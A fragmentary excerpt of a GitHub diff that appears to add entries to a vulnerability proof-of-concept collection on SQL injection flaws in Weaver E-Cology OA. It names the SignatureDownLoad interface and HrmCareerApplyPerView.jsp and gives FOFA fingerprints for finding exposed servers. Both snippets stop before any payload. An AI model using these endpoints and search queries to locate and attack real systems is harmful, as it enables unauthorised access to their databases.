18 changes: 18 additions & 0 deletions 18 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,18 @@ ## 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞 ## fofa ``` app="泛微-OA(e-cology)" ``` ## poc ``...
泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 ## 漏洞影响 ``` 泛微OA E-Cology ``` ## FOFA ``` app="泛微-协同办公OA" ``` ## 漏洞复现 登录页面 %20...